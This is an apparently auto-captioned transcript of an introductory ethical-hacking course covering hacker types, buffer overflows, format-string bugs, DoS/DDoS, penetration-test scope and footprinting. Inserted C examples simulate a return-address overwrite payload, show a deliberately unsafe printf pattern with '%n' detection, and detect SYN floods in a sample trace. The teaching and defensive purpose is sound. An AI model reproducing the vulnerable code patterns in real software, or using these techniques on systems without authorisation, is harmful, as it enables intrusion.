
for that matter.

In this case, again, Bill Gates had donated

some money to MIT,

which allowed them

to have a new building,

and he was coming

to MIT to visit

and give a talk

about Microsoft Windows

and its systems.

And as you can see, the

Windows systems installed

in the entryway of the building

were hacked to be running Linux

instead, and you can see here

that Tux

the penguin is saying welcome

to the William H.

Gates Building. Again, those were

some students who decided

that they wanted to make a point

about Linux and Microsoft

and Windows to Bill Gates,

and they thought hacking was

the best way to go about it.

Sometimes you hack just

for the challenge.

Here's an example again at MIT

where some students turned


the facade of a building

into a Tetris game board.

Now, this was

a reasonably difficult hack,

and the students went

after it just for the challenge

of completing it, and just

so they could have

some pride of ownership

and be able to say

that they were able

to pull this off.

You know, the things

that teenagers do to show off

to other teenagers:

it just increases

in scale. Now, in spite

of its difficulties

and its challenges and all

the obstacles and planning

that had to go into it,

they were able to pull it off

and now they have

those bragging rights.

So that was one

of the instances

where somebody would hack just

for the challenge and

for the fun of it.

Now, sometimes you want

to hack to prevent theft,

and this is where we get

more specifically into

computer-related hacking.

You see a lot of articles

and stories in the news

over the last few

years about cybercrime,

and here is an example

of data theft: a compromise

of fewer than

one-and-a-half million cards

at Global Payments.

So there were some attackers

who got into this

company, Global Payments,

and they were able to pull

out about a million and a half

credit card numbers

during the intrusion there.

So what you may want to do

is learn

how to hack in order

to find these holes

in your systems or applications

or your employer's systems

so that you can fix these holes

and prevent these compromises

from happening, because of

the reputational hit

that your company takes

when things

like these happen.

You have the risk of completely

going out of business.

So just to protect

your job, to protect the company

and protect your own

line of business,

you may just want

to learn to hack,

and that's a very good reason.

Now, you may also want

to find all the problems

that exist in your systems

before putting them out

and deploying them,

so that you can keep

these attackers from getting in

and stealing critical

or sensitive information.

Sometimes you may want to hack

to get there before the bad guys,

and the same sort

of idea is the last one,

where we're going to talk

about what exactly

ethical hacking is.

We were just talking

about how sometimes

you may want to hack

into your own system

before publishing it

out to the public.

Let's take Internet Explorer,

for example.

Now Internet Explorer was

actually published to the public

with some critical

errors in the code,

and these flaws were heavily

exploited by people

who actually found them.

Now a number of people

in the world go out looking

for these flaws,

and they call themselves

security researchers,

and they get in touch

with the vendors

after they've found a flaw

or a bug and work with

the vendors to get it fixed.

What they end up with is

a bit of reputation.

They get a name for themselves,

and that name recognition

may end up getting them a job

or some speaking engagements

or a book deal

or any number of ways

that you could cash in

on some name recognition

from finding these sorts of bugs

and getting them fixed.

If you want to get there

before the bad guys,

you may think you're

helping out a vendor,

you may want to just

make a name for yourself,

or you may want to find

these sorts of bugs

before the bad guys do,

because think about the bad guys

finding them: they

don't announce them

and they don't get them fixed,

and that makes everybody

a little less secure.

Finally, you may want

to protect yourself.

"Hacked computer companies

fight cyber criminals"

is a news headline

from June 18, 2012,

and we're starting

to see these sorts

of news headlines show up

as companies are starting

to retaliate against attackers.

Now, in order to

retaliate against attackers,

you need to be able

to use the same sort

of skills and techniques

and knowledge and experience

that those attackers have,

and that's where your company

may want you to learn to hack,

or the company may want

to bring in people

who are skilled

at these sorts of activities

so that they can

attack the attackers,

and hopefully you end up

with a more steely exterior

and you get a reputation

for not being a company

that people want to go

after. Those are several reasons.

And there you go.

I gave you a bunch

of reasons as to why

you may want to hack:

for fun, to prove a point, to protect

yourself, to protect the company

so it doesn't go out of business,

along with another

bunch of reasons.

Okay.

So now that we have talked about


why you would want to hack.

Let's move on to the types


of hackers that exist.

Now we're going to be talking

about the different types

of hacking, and the first

type of hacking

that I want to discuss

is ethical hacking

and ethical hackers,

which is really

what we're going to be talking

about for the rest

of these lessons. Now,

an ethical hacker is somebody

who thinks like

a black hat hacker,

or thinks like somebody

who is intent on breaking

into your systems,

but follows a moral compass

that's more in line

with probably the majority

of the population.

So their intent isn't to do

bad things; their intent

is to look for bad things

and get them fixed

so that bad things don't happen.

Ethical hackers aren't out

to destroy anything

and they're not out

to break anything

unless it's deemed

to be acceptable as a part

of the engagement

and also necessary

in order to demonstrate

a particular vulnerability

to the organization that

they're working with. So

that's an ethical hacker,

and there's a certification

that's available

from the EC-Council.

It's the Certified Ethical

Hacker, and, you know,

if you find

certifications valuable

and this sort of thing is

what you want to do,

then the Certified Ethical Hacker

may be something you

might want to look into.

Now, let's talk about

black hat hackers.

There are plenty of cases

of black hat hackers

through the years, and

let's talk about a guy

in particular called

Kevin Mitnick.

This guy right here

is a particularly

good example, probably

because he was a black hat

hacker for a lot of years.

His goal was to cause

mischief, to steal

where necessary, and just

to be engaged in the lifestyle

of being a hacker

and doing whatever was necessary

to continue doing

whatever he was doing,

even if it crossed moral boundaries

or ethical boundaries.

And so Kevin Mitnick here was

involved for well over a decade

in computer crime

and was finally

picked up by the FBI,

and he was charged

and prosecuted and he

was eventually convicted

of some of the activities

that he was involved with. Now,

you may be able to argue

that Kevin is a gray hat hacker

as well, and a gray

hat hacker is somebody

who kind of skirts

the line between black

and white hat hacking,

and white hat hacking

is really what

an ethical hacker is. So instead

of saying ethical hacker,

you could say white hat hacker.

It's the same idea:

a white hat hacker is somebody

who acts for good,

if you think of it like that,

if you want to think

of it as good versus evil,

and what they're really

doing is they're in it

for the technical challenge.

They're looking to make

things better, make things

more efficient, improve them

in some way.

On the other hand, the black hat hacker is out

for the money, for the thrill.

It's really criminal activity,

and a gray hat hacker is

somebody who may employ

the tactics and techniques

of a black hat hacker,

but have sort of a white hat

focus. In other words,

they're going to do things

that may be malicious

and destructive in nature,

but the reason they're doing

it is to improve

the security posture

of an organization

that they're working

with. So you can see

there's actually a book

called Gray Hat Hacking.

It's a pretty good book

and it details a lot

of the tactics and strategies

and techniques we'll be going

over in subsequent lessons

in this video.

Now one other type of hacking

that I want to talk about is

a thing called hacktivism,

and you'll find hacktivism

all over the place.

An example in the last year

or so, and certainly in recent

memory, is called Lulz Security.

Yeah, you heard that right:

it's called Lulz Security,

and you can argue

that LulzSec is actually

a response to another type

of activism: an

organization called Anonymous

started hacking companies

like Sony to protest

their involvement in a lawsuit

regarding a PlayStation

3 hacker. Now Lulz Security

was supposedly protesting

the treatment of Anonymous,

or was hacking in support

of this group Anonymous,

so they hacked a number

of companies and did things like

pull information, usernames

and passwords, from the databases

at these companies, and they said

that the reason was to shine

a light on the security

of these companies

and also theoretically

embarrass the companies

with their weak

or poor security postures.

And the problem with that was

that they were doing this

by posting information

that they had found online,

and that information

often included details

about customers of

these particular corporations.

And for an ethical hacker,

a white hat hacker,

that would cross the boundary

into causing harm.

So there's no reason

for me as an ethical hacker

to post information

in a public forum about somebody,

because I could be doing

damage to them.

But in this case Lulz Security

and Anonymous, specifically

Lulz Security, were engaged

in a form of hacktivism,

and what they were doing

was not only damaging

to the corporations;

it certainly was detrimental

to those people. So,

different types of hackers

and different types

of hacking: we've got

ethical or white hat hacking,

you've got black hat, gray hat,

and then we finally got hacktivism.

It's really the goal

and the means that vary

from one to the other.

Okay.

So now that we've discussed


the types of hackers.

Let's also discuss the skills


necessary to become one.

So what we're going to discuss

in this part are


the different skills

that are required

or will be learned as
a part of this video.

So initially, just

for basic computing, you

need a basic understanding

of operating systems

and how to work them.

There are going to be several

fundamental types of tasks

that I won't be going

into any detail at all on,

and you need to know

how to run programs

and do things like open

up a command prompt

without me walking you

through how to do that.

So I am going to assume

that you have some basic

understanding of how to do

these sorts of tasks.

Also, you need an understanding

of the basic system software,

and you'll need a basic

understanding of how to use

command line utilities.

There are a number

of tools and programs

that we're going to be going

through in this video,

and many of them use

the command line. Now,

whether it's on Windows

or Linux, you still need

to be familiar with typing

and being able to run programs

from the command line,

and with the various command

line switches and parameters

that those types

of programs are going to use. Now,

from a networking perspective,

you need a basic understanding

of some simple

networking concepts.

You need to know

what cables are, and switches

and hubs, and how systems

are networked together.

You don't really need

a deep level of understanding.

I'll be going

through some protocols

at a reasonably deep level,

because I think

it's important as

an ethical hacker to understand

what's going on

at the protocol level

so that you can know

better what you are

doing and how to achieve

the goals and tasks

that you have before you. So

we're going to be going

over some protocols.

So just understanding

what protocols are

and how they go together:

those sorts

of things are necessary

from a networking perspective.

Now, we're going to also be


learning a bunch of life skills.

Yes, there are some life skills


that it's important to have.

I think the most important one

is the ability to accept failure

and persevere, and by that

I mean you're going to be

running across several things

that just don't work

the first time around,

and it's going to take

a little bit of time

and stick-to-itiveness to plug

away and keep going

until you get something to work.

And the way that you get


things to work is having

an ability to problem solve

and sometimes solving


problems requires being

a little creative.

Sometimes you need

to think out of the box

and come at a problem

from a different perspective

in order to find a solution.

Throughout the course

of this video

you're going to run

across a lot of sticky problems

through the course of learning

about being an ethical hacker

and just doing the work,

because it's not a simple

"here's a little recipe for

how to do this, now go follow

this recipe every time and

you're going to be successful."

Every situation is different.

Every system is different.

You're going to run across

some pretty sticky problems

and you're going to have to just

wade in and get your hands dirty

and keep failing and failing

and failing and failing

until you find a way to succeed.

So I think those skills are

very necessary to learn

how to be an ethical hacker

and to dig through some

of the material

that we'll be going over in this video.

Now, as far as what you

are going to be learning:

you're going to be learning

about how to use a lot of tools.

You're going to learn

networking, and by that

I mean we're going to be talking

about the different protocols

that are involved

in networking systems together.

You're going to learn

about security and security

postures. Security is the heart

and soul of ethical hacking.

It's why we do ethical hacking:

in order to make systems

and networks more secure

than they were previously.

That's the goal.

From a networking perspective,

we're going to be talking

about how to read packets

from network captures.

You're going to be going

into TCP/IP-related protocols

in a fairly significant amount

of detail, and you're

going to understand

how protocols interact

with one another.

So we're going to do all

that, and reading packets

is going to be really important,

and we're going to do

a fair amount of that.

In addition to just

a fundamental approach to learning

how to read packets,

in several lessons

we're going to read packets

as a way of understanding

the different tools

that we're using

and how they work. You're going to learn

tactics and methodologies,

and you get to learn

to use the information

you've gathered in order

to get more information,

and information is really

what this is all about.

You can't do much of anything

without information,

and sometimes it takes

a fair bit of digging in order

to find that information,

and what you're going

to learn is the entry points

and the stepping stones

to get the information

that you need.

And then once you

have that information,

you're going to be learning

about ways to exploit it

in order to get deeper

into the target.

You're going to learn


security awareness.

We're going to talk about risk

and understanding risks

and vulnerabilities, primarily

recognizing the difference

between a vulnerability

and an exploit, and there's

a significant difference

there. So security awareness,

and understanding what a risk is

and how that impacts your target,

is going to be key

to a lot of things

that we talk about.

So it sounds like a lot.

We're going to cover a fair bit

of ground, not all

of it at a deep level.

Sometimes we are going

to skim the surface,

but there's an awful lot

of material to cover.

So let's get started.

Okay, so that was all

about the skills

that we are going to develop

throughout this video

and that might be necessary

for you to become

an ethical hacker.

Now,

let's talk about

the types of attacks

that you might be dealing

with as an ethical hacker yourself.
So now we're going to be talking
about the types of attacks.

Now one type of attack

that you'll find common,

particularly in cases

of hacktivism, for example,

or cases where people are trying

to make a particular point

or just be a general pain, is

this idea of defacing. Defacing

goes back for quite a while.

It's the idea

of sort of digital graffiti,

where you've left your mark

or your imprint behind

so that everybody knows you were

there. It's primarily a website thing,

and it's really just making

alterations to something.

It used to be pretty common

a long time ago.

It was not unusual

for businesses or people

or just organizations

in general to have

their homepage replaced

by this other thing

that was along the lines

of "hey, I was here

and I took over your web page."

We also have a pretty common one,

or certainly one that has been common

over the years,

and it's been a pretty good path

towards quality exploits

and high-profile vulnerabilities,

and that's the buffer overflow.

Now a buffer overflow is

a result of the way programs

are stored in memory.

When programs are running

they make use of a chunk

of memory called a stack,

and it's just like

a stack of plates:

when you put a bunch

of plates down and then pull

a plate off, you're going

to pull the top plate,

the one that was put on last.

So it's the same thing

with the stack here:

we're accessing memory,

and This has to do with the way


functions are called in memory

when you call the function


a chunk of memory gets thrown

on top of the stack and


that's the chunk of memory

that gets accessed

and you've got a piece


of data in memory,

but in that stack and


that's called a buffer

and when too much data


is sent and try to put

into the buffer it


can overflow now the bounds

of the configured area


for that particular buffer.

It can overflow the bounds

of the configured area


for that particular buffer.

Now the way stack Are put


together we end up

with the part of the stock

where the return address


from the function is stored.

So when you overflow


the buffer you have

the ability to potentially


override that return

at which point you


can control the flow

of execution of programs.

And if you can control the flow


of execution of the program,

you can insert code

into that memory that could


be executed and that's

where we get buffer overflow


that turns into exploits

that creates the ability to get


like a command shell

or some other useful thing


from the system

where the The buffer


overflow is running.

So that's a buffer
overflow in short.
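The overwrite described above, as an added example that is not part of the course material: the stack frame is modelled as a byte array with a 16-byte buffer directly below an 8-byte saved return address (the layout, the "real" return address 0x401000 and the attacker's fake value are assumptions for the demonstration). `copy_unchecked` trusts the caller's length the way `strcpy()` or `gets()` trust their input, so a 24-byte payload lands on the saved return address; `copy_checked` is the bounded version that rejects the same payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated stack frame (assumed layout for the demo, not a real program):
 * bytes [0..15]  = the local buffer
 * bytes [16..23] = the saved return address, as on an x86-64 stack */
#define BUF_LEN   16
#define RET_OFF   BUF_LEN
#define FRAME_LEN (BUF_LEN + sizeof(uint64_t))

typedef struct {
    uint8_t bytes[FRAME_LEN];
} frame_t;

static void frame_init(frame_t *f, uint64_t saved_ret) {
    memset(f->bytes, 0, FRAME_LEN);
    memcpy(f->bytes + RET_OFF, &saved_ret, sizeof saved_ret);
}

static uint64_t frame_saved_ret(const frame_t *f) {
    uint64_t r;
    memcpy(&r, f->bytes + RET_OFF, sizeof r);
    return r;
}

/* Vulnerable pattern: the copy trusts the caller's length, exactly like
 * strcpy()/gets() trust their input. Anything past BUF_LEN lands on the
 * saved return address. The clamp to FRAME_LEN only keeps the simulation
 * inside its own memory; a real stack would keep being overwritten. */
static void copy_unchecked(frame_t *f, const uint8_t *src, size_t len) {
    if (len > FRAME_LEN) len = FRAME_LEN;
    memcpy(f->bytes, src, len);
}

/* Hardened pattern: refuse anything larger than the buffer. */
static int copy_checked(frame_t *f, const uint8_t *src, size_t len) {
    if (len > BUF_LEN) return -1;
    memcpy(f->bytes, src, len);
    return 0;
}

/* The classic payload: padding that fills the buffer, then the address the
 * attacker wants execution to continue at when the function returns. */
static size_t build_payload(uint8_t *out, uint64_t fake_ret) {
    memset(out, 'A', BUF_LEN);
    memcpy(out + BUF_LEN, &fake_ret, sizeof fake_ret);
    return FRAME_LEN;
}

/* Saved return address after the unchecked copy of the payload. */
uint64_t ret_after_unchecked(uint64_t real_ret, uint64_t fake_ret) {
    frame_t f;
    uint8_t payload[FRAME_LEN];
    frame_init(&f, real_ret);
    size_t n = build_payload(payload, fake_ret);
    copy_unchecked(&f, payload, n);
    return frame_saved_ret(&f);
}

/* 1 when the checked copy rejects the payload and the return address is intact. */
int checked_copy_rejected(uint64_t real_ret, uint64_t fake_ret) {
    frame_t f;
    uint8_t payload[FRAME_LEN];
    frame_init(&f, real_ret);
    size_t n = build_payload(payload, fake_ret);
    int rc = copy_checked(&f, payload, n);
    return rc == -1 && frame_saved_ret(&f) == real_ret;
}

int main(void) {
    printf("unchecked: saved return address is now 0x%llx\n",
           (unsigned long long)ret_after_unchecked(0x401000ULL, 0x4141414141414141ULL));
    printf("checked:   payload rejected, return address intact = %d\n",
           checked_copy_rejected(0x401000ULL, 0x4141414141414141ULL));
    return 0;
}
```

The point of the simulation is the adjacency: nothing in the copy "targets" the return address, it is simply the next thing in memory after the buffer, which is why a length check on the way in is the whole fix.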

Sometimes we also have format string attacks,

and sometimes these can be precursors to buffer overflows.

Now format strings come about because the C programming language makes use of these format strings

that determine how data is going to be input or output.

So you have a string of characters that defines

whether the subsequent input or output is going to be an integer,

or whether it's going to be a character,

or whether it's going to be a string or a floating point, that sort of thing.

So you have a format string that defines the input or the output.

Now if a programmer gets lazy, leaves off the format string

and provides only the variable that's going to be output,

you, for example, have the ability to provide that format string.

If you provide that format string, what then happens is

the program starts picking the next piece of data off the stack and displays it,

because that way we can start looking at data that's on the stack of the running program

just by providing a format string.

If I can look at the data, I may be able to find information

like a return address or some other useful piece of information.

There is also a possibility of being able to inject data into the stack

using this particular type of attack.
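The lazy pattern and its fix side by side, as an added example that is not from the course (the input strings are constructed). `log_unsafe` passes user data straight in as the format, `log_safe` keeps a constant format and passes the data as an argument. The only user input that is safe to run through both is one whose directives need no arguments, so "100%%" is used to show the difference: the unsafe version interprets it, the safe version prints it literally. The two checkers are what you would run on untrusted text before it can ever reach a `printf` family call; `%n` gets its own check because it is the directive that writes to memory rather than only reading the stack.

```c
#include <stdio.h>
#include <string.h>

static char out[128];

/* Vulnerable pattern: user data used as the format string. The compiler
 * warns about a non-literal format but still accepts it. */
const char *log_unsafe(const char *user) {
    snprintf(out, sizeof out, user);     /* user controls the directives */
    return out;
}

/* Fixed pattern: a constant format, user data is only an argument. */
const char *log_safe(const char *user) {
    snprintf(out, sizeof out, "%s", user);
    return out;
}

/* Counts '%' conversions in untrusted text, treating "%%" as a literal
 * percent. Any count > 0 means the string must never be used as a format. */
int count_conversions(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* escaped percent */
        n++;
    }
    return n;
}

/* 1 if the input contains the %n write directive, skipping flags, width
 * and length modifiers between the '%' and the conversion character. */
int has_write_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        const char *q = p + 1;
        while (*q && strchr("0123456789.-+ #lhzjt", *q)) q++;
        if (*q == 'n') return 1;
    }
    return 0;
}

int main(void) {
    printf("unsafe(\"100%%%%\") -> \"%s\"\n", log_unsafe("100%%"));
    printf("safe  (\"100%%%%\") -> \"%s\"\n", log_safe("100%%"));
    printf("conversions in \"%%x %%x %%n\": %d, has %%n: %d\n",
           count_conversions("%x %x %n"), has_write_directive("%x %x %n"));
    return 0;
}
```

Do not call `log_unsafe` with "%x" or "%n" style input in a test: with no matching arguments that is undefined behaviour, which is exactly the condition the attack relies on.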

Now moving on to our next type


of attack is a denial

of service a denial of service.

This is a pretty common one

and you'll hear


about this a lot.

This is not to be confused with


the one that I'll be talking

about after this and that is


a distributed denial of service.

So this one that you see is

that this is a denial


of service attack
and a denial of service
is any attack or action

that prevents a service


from being available

to its legitimate
or authorized users.

So you hear about a ping flood or a SYN flood.

A SYN flood is basically SYN packets being sent to your machine constantly.

Or a Smurf attack, and a Smurf attack has to do with ICMP echo requests and responses

using broadcast addresses.

That one's been pretty well shut down over the last several years.

You can also get a denial


of service simply

from a malformed packet


or piece of data

where a piece
of data is malformed

and sent into a program.

Now if the program


doesn't handle it correctly

if it crashes suddenly
you're not able to use

that program anymore.

So therefore you are denied.

The service of the program


and thus the denial of service.
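What a SYN flood looks like from the defender's side, as an added example that is not part of the course: a SYN flood fills the server's half-open connection backlog with SYNs that are never followed by the handshake's final ACK. The sample below is a constructed packet trace (documentation addresses, one flag character per packet), and the detector counts SYNs minus ACKs per source and flags any source over a threshold.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample trace: source address and the TCP flag that matters
 * for a half-open count ('S' = SYN, 'A' = the final ACK of the handshake). */
typedef struct { const char *src; char flag; } pkt_t;

static const pkt_t SAMPLE[] = {
    {"192.0.2.10", 'S'}, {"192.0.2.10", 'A'},
    {"198.51.100.7", 'S'}, {"198.51.100.7", 'S'}, {"198.51.100.7", 'S'},
    {"192.0.2.10", 'S'}, {"192.0.2.10", 'A'},
    {"198.51.100.7", 'S'}, {"198.51.100.7", 'S'}, {"198.51.100.7", 'S'},
    {"192.0.2.11", 'S'}, {"192.0.2.11", 'S'}, {"192.0.2.11", 'A'},
    {"198.51.100.7", 'S'}, {"198.51.100.7", 'S'},
};
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

/* SYNs from one source that never got their ACK: the half-open backlog
 * a SYN flood is trying to fill. */
int half_open_for(const pkt_t *pkts, size_t n, const char *src) {
    int syn = 0, ack = 0;
    for (size_t i = 0; i < n; i++) {
        if (strcmp(pkts[i].src, src) != 0) continue;
        if (pkts[i].flag == 'S') syn++;
        else if (pkts[i].flag == 'A') ack++;
    }
    return syn - ack;
}

/* Flags every source whose half-open count exceeds the threshold and returns
 * how many were flagged; up to max_out of them are written to out_srcs. */
int flag_syn_flood_sources(const pkt_t *pkts, size_t n, int threshold,
                           const char **out_srcs, int max_out) {
    int flagged = 0;
    for (size_t i = 0; i < n; i++) {
        const char *src = pkts[i].src;
        int seen = 0;                         /* evaluate each source once */
        for (size_t j = 0; j < i; j++)
            if (strcmp(pkts[j].src, src) == 0) { seen = 1; break; }
        if (seen) continue;
        if (half_open_for(pkts, n, src) > threshold) {
            if (flagged < max_out) out_srcs[flagged] = src;
            flagged++;
        }
    }
    return flagged;
}

/* Convenience wrappers over the constructed sample. */
int half_open_in_sample(const char *src) {
    return half_open_for(SAMPLE, SAMPLE_LEN, src);
}

int flagged_count_in_sample(int threshold) {
    const char *tmp[8];
    return flag_syn_flood_sources(SAMPLE, SAMPLE_LEN, threshold, tmp, 8);
}

int main(void) {
    const char *bad[8];
    int n = flag_syn_flood_sources(SAMPLE, SAMPLE_LEN, 5, bad, 8);
    for (int i = 0; i < n && i < 8; i++)
        printf("possible SYN flood from %s (%d half-open)\n",
               bad[i], half_open_in_sample(bad[i]));
    return 0;
}
```

In the sample, 192.0.2.10 completes every handshake, 192.0.2.11 has one SYN outstanding, and 198.51.100.7 has eight SYNs with no ACK at all, which is the shape of the flood. Real traffic needs a time window on the count, since a slow legitimate client also leaves SYNs outstanding briefly.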

Now, as I said, a denial of service is not to be confused with a distributed denial of service.

And I know it's pretty trendy, particularly in the media, to call any denial of service a DDoS.

Now it's important to note that any denial of service is not a DDoS.

A DDoS, or as you might know it, a distributed denial of service, is a very specific thing.

A distributed denial of service is a coordinated denial of service

making use of several hosts in several locations.

So if you think about a botnet as an example,

a botnet could be used to trigger a distributed denial of service,

where I've got a lot of bots that I'm controlling from a remote location

and I'm using all these bots to do something like sending a lot of data to a particular server.

When I've got a lot of systems sending even small amounts of data,

all of that data can overwhelm the server that I'm sending it to.

So the idea behind a distributed denial-of-service attack is

to overwhelm resources on a particular server in order to cause that server not to be able to respond.

Now the first known DDoS attack used the tool called Stacheldraht,

which is German for barbed wire.

Stacheldraht came out of some work that a guy by the name of Mixter was doing in 1999.

He wrote a proof of concept piece of code called TFN, which was the Tribe Flood Network.

Let me just show that to you.

So you can see on the Wikipedia page

the Tribe Flood Network or TFN is a set of computer programs

that is used to conduct various DDoS attacks such as ICMP floods, SYN floods, UDP floods and Smurf attacks.

Now, I know many people don't really consider Wikipedia a really good source of any sort of knowledge,

but it's a good place to start off.

So if you want to read about all these types of attacks, like ICMP floods and what exactly a SYN flood is,

you can always do that from there. It's not that bad a place.

Of course, you shouldn't use Wikipedia as your final Rosetta Stone. Moving on.

So this program called Stacheldraht was used to attack servers like eBay and Yahoo!

back in February of 2000,

so that attack in February of 2000 was really the first known distributed denial-of-service attack,

which is not to say that there weren't denial of service attacks previously.

Prior to that there were certainly plenty of them, but they were not distributed.

This means there weren't a lot of systems used to coordinate and create a denial-of-service condition,

and that is what makes the distributed denial-of-service attack different.

So that's a handful of types of attacks

and some pretty common attacks

that you're going to see


as an ethical hacker

when you become


an ethical hacker

or if you're trying
to become an ethical hacker,

you should always know


about these types of attacks.
Okay.

So in this lesson,

we're going to be talking


about penetration testing

and some of the details


around how it works

and logistics, and specifically things like scope.

So what exactly is penetration testing?

So well, not surprisingly.

It's testing to see


if you can penetrate something

which means you're going


to check to see

whether you can break


into a particular thing.

Whether it's a server or


in applications depending

on the type of Engagement.

You've got you may have


the ability to try to break

in physically to a location

but primarily what you're going to be doing with penetration testing

is trying to break into systems and networks and applications.

And that's kind of what it's all about,

and this may actually involve


social engineering attacks.

So it may require you


to make a phone call

to somebody and get them


to give you their username
and password or some other type
of social engineering attack

where maybe you send a URL


via a crafted email.

Sometimes it's just strictly


a technical approach.

where you're running scans and you're running Metasploit and you're gaining access that way,

or maybe through some other type of technological or application sort of connection;

sometimes it's physical access


that you need.

So in order to get access


to a particular system,

if you can get physical access


then maybe you can get in

So that's what exactly penetration testing is.

It's checking whether you


can get into a system

whether it be physically
or on a network.

So what are the goals

of penetration testing? The goals would be to assess weaknesses in an organization's security posture.

We want to figure out where they're vulnerable so that they can go and fix these problems. You want

to help them understand


their risk positions better

and what they can

or may be able to do
to mitigate those risks

and ultimately you want


to be able to access systems

in a particular way
to find weaknesses.

So those are really


sort of the goals

of penetration testing now


from a result standpoint

when you're done you're testing


what you are going to do.

Well, you're probably going to generate a report, and by that I don't mean

you're going to run some automated tool, get it to generate the report for you,

hand that to the client and then they write you a really large check.

That's not really how it works.

You're going to write a report


detailing the findings

in a detailed way

so that it includes
what did you do to find out

what you actually found out

and how you can actually


mitigate that particular risk.

So you should really include


remediation activities in order

to fix this vulnerabilities

that you find. It's pretty easy to walk around saying hey, that's a problem, and that's problematic, and that's a problem.

There's really not a lot of value in that. Where there's value is saying hey,

that's a problem.

And here's how you


can go about fixing it.

So let's talk about the scope


of penetration testing.

So firstly you want to actually realize how big the breadbox is,

and specifically what it is that the two of you have agreed to,

that being you, the ethical hacker, and the other party being the authorized person

who gives you permission to ethically hack.

Specifically, they agree that you can do penetration testing

and that you can target them as an organization or client,

and what you have agreed to: are there any exclusions,

or any sort of areas that they say you're not allowed to touch?

So, for example, if they've got a database server,

maybe there's a lot of really sensitive data on it and they're a little hesitant,

and they may put a "don't touch this thing" clause in the scope.

So there are a lot


of different reasons

why they may exclude


areas from the scope

and if they exclude them


then trust their reason

and listen to them

what They have to say


in terms of this is

what we want you to accomplish.

So along those lines you


really need to get sign off

from the target organization.

Now, we've talked


about this before

and this is certainly all


about the ethics then trust

and it's also about legality

because if you do something

that you don't have


permissions to do you

could be prosecuted for that.

So definitely get the scope


very clear in writing

and with signatures attached


to it as to what you can

and what you can't do

and always get approval


from the right people

and make sure you get somebody who has the right level of permissions

and is at the right level of management

so that they can sign off on it, understanding

and accept the risk

that is associated
with a penetration test.

So let me talk a little bit


about security assessments

and how they differ


from penetration tests.

The security assessment


is a hand

in hand approach with clients.

So you would walk in doing


a collaborative thing

where you're a trusted partner


and you are live with them

and your goal


isn't to penetrate them

and point out all the things.

That are really bad,

but it's to get a full


assessment of the risk

that the organization is exposed

to, and you would probably provide more details about fixes than maybe you would in a penetration test.

Now what we're going to do


is we're going to walk in

and make sure

that the policies

and procedures they have


in place are really

what they need


for the organization

and the risk appetite


that they've got
and we're going to make sure that the policies and procedures have controls

that can tell us whether they are actually being adhered to or not,

whether procedures and policies are being followed.

A security assessment is probably a little bit more comprehensive than a penetration test,

and you would look


at more factors to assess

the security postures


of the organization

in their overall risk

and you would tailor the output


based on the risk appetite

and what they're most interested


in and that's not to say

that I'm going to tell them


what they want to hear.

But if there's something


that they know and I know

that they're just


not going to do

I'm not going to be making


a big deal out of it

because they're already aware of it,

and I'll make a note of it in the report just for completeness,

but I'm not going to go out


in a lot of details.

So it's really kind of a hand in hand collaborative approach where, again,

you're not just saying what they want to hear;

you're providing some real security and risk guidance towards their activities and other things.

A penetration test, on the other hand, is limited to a fixed window,

so it may provide an unrealistic view.

So you've got a week, let's say, to do this penetration test

against your target.

Now, you're going to have


to go in you're going

to have to get setup.

You're also going to have


to start doing a bunch

of scans and make sure

that Gathering information

and screenshots and data


for your reports

you're going to have to do


all sorts of activities.

Also during the course


of that week.

You're going to be engaged


in probably beginning

to write your report

and getting a sense of


what is going to say

and what's going to be in it.

If you don't actually get any major penetration during the course of that week,

the organization may feel like they're quote-unquote secure.

That's one of the reasons why penetration testing, while really sexy and the show is nice and all,

is a problem if an organization walks out of it believing that

because in a week you didn't manage to get the keys to the kingdom, they must be secure.

That's a really misguided view, because a dedicated, skilled and motivated attacker

isn't going to just take a week or some portion of that week.

They're after something; they're going to dedicate themselves to it and really go after it.

So just because you didn't find a penetration in some subset of a week

doesn't mean that they're secure and immune and invulnerable to attacks.

It just means that during the course of that particular week

and the circumstances that were in place

you couldn't get a penetration that was really significant or major.

That's all it means.

It doesn't mean anything


beyond that and

if an organization
walks away feeling

like the secure they're going

to end up not fixing


the real vulnerabilities

that may be in place

that could expose them


to significant risks.

So that's penetration testing, its scope, its goals and how it differs from security assessments.

Now it's time to go over footprinting.

So what is footprinting? Well, footprinting is getting an idea of the entire scope of your target.

That means not just the scope

that you were given

which may be an address block, or it may be a domain name, or it may even be a set of address blocks.

Now, what you want to do


is you want to figure

out all the information

that's associated with that


in great detail

as you can possibly get so you


want the list of domain names

As you're going to go through this you probably want some sort of database

or Excel spreadsheet or something to keep track of all the information,

because you're going to have


a lot of it at the end.

You want to be able


to find information quickly.

So having some sort


of in a notepad going

with your notes or

as I said spreadsheet
or a database.

So if you can get organized

in that way you want to keep


all those sorts of things down.

So in this case, I want to do some searching on, suppose, let's say edureka.co.

Now I need network blocks.

So far what we've found out are just made-up IP addresses, because I'm just putting information down,

but I need network blocks, so you may have one IP address that you can find externally,

or you're going to want the whole range of internal blocks, and you can do a little bit of digging.

If you aren't provided those you


want specific IP addresses

for critical systems web


servers email servers databases.

If you can find any


of these things

of those sorts and you


want system architectures

and what kind of stuff are they


running are they running Intel
are they running windows?

Are they running


some Unix systems?

What are they running?

What kind of Access


Control lists they have.

These are going to be hard to get, but you may be able to guess them,

and you can guess these by doing port scans.

So what sort of responses you get back from the port scans, with the filters,

and what you don't get back, will tell you if there's an IDS around.

Or you want to do a system enumeration, or if you can get access to a system somehow,

you want to know usernames, group names and so on.

So the basic idea of footprinting is gathering information.

Now if you can get access to a system somehow, you want to know usernames and group names,

so you want system banners, routing tables,

SNMP information if you


can get it DNS host names

if you can get those now,

this is for both internal


and external on the side.

If you're doing
an internal penetration test

or ethical hacking engagement.

You want to know the networking


protocols that are out there.
Are they using TCP/IP, or are they using some UDP, or are they on IPX or SPX,

are they using DECnet or AppleTalk, or are they using some sort of split DNS?

In other words, do they have an internal DNS,

and does it give different information from the external one?

You want to check for remote access possibilities.

Now in the footprinting process you want to be very exhaustive.

You might want to try and take out email addresses, servers, domain name services,

IP addresses or even contact numbers, and you want to be very exhaustive with your approach.

